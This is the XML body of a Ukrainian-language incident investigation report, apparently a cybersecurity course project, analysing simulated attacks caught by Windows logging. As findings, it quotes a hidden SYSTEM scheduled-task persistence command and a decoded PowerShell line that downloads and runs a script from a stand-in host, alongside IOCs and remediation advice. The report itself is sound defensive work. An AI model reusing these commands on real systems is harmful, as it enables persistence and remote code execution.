            <w:tcW w:type="dxa" w:w="69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sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">schtasks.exe</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="24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Батьківський процес</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="69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sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">powershell.exe</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="24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Назва завдання</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="69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sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">WindowsUpdateCheck</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="24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Тригер</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="69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sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">/sc onlogon (при кожному вході)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="24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Обліковий запис</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="69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sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">SYSTEM</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="24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Командний рядок</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="69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sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">schtasks /create /tn WindowsUpdateCheck /tr "powershell.exe -windowstyle hidden -command Write-Host Backdoor" /sc onlogon /ru SYSTEM</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A2332"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Чому це підозріло:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Назва завдання маскується під легітимний процес оновлення Windows.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Прапорець -windowstyle hidden приховує вікно PowerShell від користувача.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Виконання від імені SYSTEM надає найвищий рівень привілеїв у системі.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Тригер onlogon забезпечує повторне спрацювання після кожного входу — класичний механізм persistence.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="0D9488" w:sz="6" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="100" w:before="260"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A2332"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Знахідка 3: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A2332"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Мережева розвідка</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">MITRE ATT&amp;CK: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0F766E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">T1016 — System Network Configuration Discovery</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">      Рівень загрози: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1D4ED8"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Низький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Команди</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="69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sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">ipconfig /all, arp -a</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="24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Виявлена IP-адреса</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="69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sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">192.168.64.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="24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Шлюз</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="69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sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">192.168.64.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A2332"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Чому це підозріло:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Збір даних про мережеву конфігурацію та сусідні хости — типовий крок підготовки до подальшого бокового переміщення (lateral movement).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="0D9488" w:sz="6" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="100" w:before="260"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A2332"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Знахідка 4: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A2332"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Обфускований PowerShell і спроба завантаження payload</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">MITRE ATT&amp;CK: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0F766E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">T1027 + T1059.001</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">      Рівень загрози: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Критичний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Процес</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="69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sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">powershell.exe</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="24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Прапорець</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="69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sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">-EncodedCommand (Base64)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="24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Розкодована команда</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="69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sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">IEX (New-Object Net.WebClient).DownloadString('http://test.invalid/payload.ps1')</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="24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Результат</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="69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sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Помилка резолву DNS — завантаження не відбулось</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2400"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="D9D9D9" w:sz="2"/>
              <w:left w:val="single" w:color="D9D9D9" w:sz="2"/>
              <w:bottom w:val="single" w:color="D9D9D9" w:sz="2"/>
              <w:right w:val="single" w:color="D9D9D9" w:sz="2"/>
            </w:tcBorders>
            <w:shd w:fill="F1F5F4" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="140"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="140"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1A2332"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Event ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="69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sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">4688</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A2332"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Чому це підозріло:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Base64-кодування — стандартна техніка ухилення від сигнатурного антивірусного детектування.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Виклик IEX (Invoke-Expression) у поєднанні з DownloadString — класична ознака fileless-атаки: код ніколи не торкається диска.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Спроба звернення до зовнішнього домену вказує на можливий Command &amp; Control (C2) канал.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">6. Індикатори компрометації (IOC)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60"/>
        <w:gridCol w:w="1900"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2200"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="D9D9D9" w:sz="2"/>
              <w:left w:val="single" w:color="D9D9D9" w:sz="2"/>
              <w:bottom w:val="single" w:color="D9D9D9" w:sz="2"/>
              <w:right w:val="single" w:color="D9D9D9" w:sz="2"/>
            </w:tcBorders>
            <w:shd w:fill="1A2332" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="140"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="140"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Тип</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5260"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="D9D9D9" w:sz="2"/>
              <w:left w:val="single" w:color="D9D9D9" w:sz="2"/>
              <w:bottom w:val="single" w:color="D9D9D9" w:sz="2"/>
              <w:right w:val="single" w:color="D9D9D9" w:sz="2"/>
            </w:tcBorders>
            <w:shd w:fill="1A2332" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="140"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="140"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Значення</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1900"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="D9D9D9" w:sz="2"/>
              <w:left w:val="single" w:color="D9D9D9" w:sz="2"/>
              <w:bottom w:val="single" w:color="D9D9D9" w:sz="2"/>
              <w:right w:val="single" w:color="D9D9D9" w:sz="2"/>
            </w:tcBorders>
            <w:shd w:fill="1A2332" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="140"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="140"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Контекст</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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Процес</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="52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b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">net1.exe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="19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Дочірній процес net.exe, розвідка користувачів</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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Назва завдання</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="52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b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">WindowsUpdateCheck</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="19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Маскується під системне оновлення</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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Командний рядок</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="52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b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">powershell.exe -windowstyle hidden</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="19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Прихований запуск інтерпретатора</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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Облікові дані</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="52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b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">SYSTEM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="19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Завдання виконується з найвищими правами</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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Прапорець</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="52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b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">-EncodedCommand</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="19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Обфускація команди через Base64</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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Мережева адреса</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="526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Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">test.invalid</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="19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Зовнішній (вигаданий) хост призначення</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">7. Рекомендації</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Негайні дії</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Видалити заплановане завдання WindowsUpdateCheck: schtasks /delete /tn WindowsUpdateCheck /f</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Перевірити обліковий запис Bolyuta на предмет компрометації, примусово скинути пароль</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Заблокувати домен test.invalid (та аналогічні невідомі домени) на рівні мережевого фільтра / DNS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Довгострокові заходи</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Увімкнути PowerShell Script Block Logging (Event ID 4104) для деобфускації команд у реальному часі</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Налаштувати алерт на створення запланованих завдань з обліковим записом SYSTEM поза стандартним переліком</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Розглянути впровадження EDR-рішення з контролем цілісності для покриття випадків, де Sysmon заблоковано політиками Secure Boot</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Обмежити використання -EncodedCommand через Constrained Language Mode або AppLocker</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">8. Висновок</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Усі чотири змодельовані техніки зловмисника було успішно виявлено виключно за допомогою вбудованого журналювання Windows, без використання сторонніх агентів на кшталт Sysmon. Це підтверджує, що навіть базова конфігурація auditpol дозволяє побудувати робочий процес виявлення інцидентів рівня SOC L1.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Найбільш критичною знахідкою є закодований PowerShell-скрипт (Знахідка 4), що поєднує одразу дві техніки ухилення від детекції та потенційного встановлення зв'язку з C2-сервером. Знахідка 2 (заплановане завдання) демонструє типовий механізм закріплення в системі, який слід пріоритетно моніторити в продакшн-середовищах.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Проєкт виконано в межах навчального курсу з кібербезпеки. Усі дії відтворені в ізольованому середовищі та не становлять реальної загрози.</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Сторінка </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="595959"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:fldChar w:fldCharType="begin"/>
      <w:instrText xml:space="preserve">PAGE</w:instrText>
      <w:fldChar w:fldCharType="separate"/>
      <w:fldChar w:fldCharType="end"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="595959"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:t xml:space="preserve"> з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color w:val="595959"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:t xml:space="preserve">Звіт про розслідування інциденту</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="595959"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:t xml:space="preserve">	WIN-EL1M42JDN20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9488" w:sz="12" w:space="6"/>
      </w:pBdr>
      <w:spacing w:after="200" w:before="360"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="1A2332"/>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0F76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2026-06-21T12:23:17.221Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-06-21T12:23:17.234Z</dcterms:modified>
</cp:coreProperties>
</file>

<file path=docProps/custom.xml><?xml version="1.0" encoding="utf-8"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/custom-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"/>
</file>